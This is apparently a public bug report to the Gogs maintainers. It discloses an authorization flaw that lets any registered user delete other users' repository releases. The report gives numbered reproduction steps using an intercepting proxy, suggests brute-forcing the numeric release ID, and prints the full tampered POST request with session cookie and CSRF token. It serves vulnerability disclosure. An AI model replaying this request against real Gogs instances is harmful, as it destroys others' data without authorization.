As my previous report sent to the email that you specified to send vulnerabilities was ignored for more than a month, I see the need to report the following vulnerability through this method. Please excuse me if this causes you any inconvenience.

• Gogs version (or commit ref): 0.9.99.0915
• Git version: the one that your demo site uses as of 16th Dec 2016
• Operating system: same as above answer
• Database: same as above answer
  • PostgreSQL
  • MySQL
  • SQLite
• Can you reproduce the bug at https://try.gogs.io:
  • Yes. URL: https://try.gogs.io/[USERNAME]/[REPOSITORY]/releases/delete
  • No
  • Not relevant
• Log gist:

Description

Ability to delete arbitrary repository's releases

I found that I'm able to delete arbitrary releases from any Gogs instance in which I've a registered account.

To reproduce this vulnerability, please, follow this steps:

1. Create an account for attacker, let's call this account gogsreporteA.
2. Create an account for victim, let's call this account gogsreporteB.
3. Activate them both.
4. Login to userA and create a repository with any values you want. Then create a release of it.
5. Login to userB and create a repository (private or not, it's your choice) with any values you want. Then create a release of it.
6. Now, once it has been created, turn on any http traffic proxy with the ability to intercept traffic (Burp Suite was my choice).
7. Enable the proxy and then, delete the release you created in step 3. (the gogsreporteA's release).
8. Now the request will look like: (see below)
9. Modify the id parameter and put the release ID from our victim (gogsreporteB). But... you do not know it, right? See that it is a numeric ID, we could bruteforce it (Burp's intruder or simple python script), Let's assume we know it.
10. Put that ID in the request and forward it.
11. The gogsreporteB's release was removed.
12. Profit (?)

POST /gogsreporteA/usedtohackotheruser/releases/delete HTTP/1.1
Host: try.gogs.io
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Cookie: lang=en-US; i_like_gogits=8ea2647e8d8e44fa; _csrf=8zS9PCrDiSOtu13AOdo1jQPujE06MTQ4MTg0NDM2MzgyMzI5ODUwMw%3D%3D
DNT: 1
Connection: close

_csrf=8zS9PCrDiSOtu13AOdo1jQPujE06MTQ4MTg0NDM2MzgyMzI5ODUwMw%3D%3D&id=[VICTIM-REPO-RELEASE-ID-HERE]

Kind regards,
Miguel Ángel Jimeno